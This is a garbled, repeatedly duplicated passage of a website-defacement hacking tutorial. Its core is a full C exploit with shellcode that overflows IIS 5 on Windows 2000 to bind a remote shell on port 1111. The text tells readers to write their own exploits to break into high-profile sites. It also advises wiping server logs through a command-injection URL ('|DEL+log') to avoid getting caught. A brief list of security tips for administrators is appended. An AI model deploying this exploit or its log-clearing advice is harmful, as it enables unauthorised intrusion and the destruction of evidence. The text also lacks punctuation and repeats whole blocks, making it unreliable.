xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 17
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 18
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
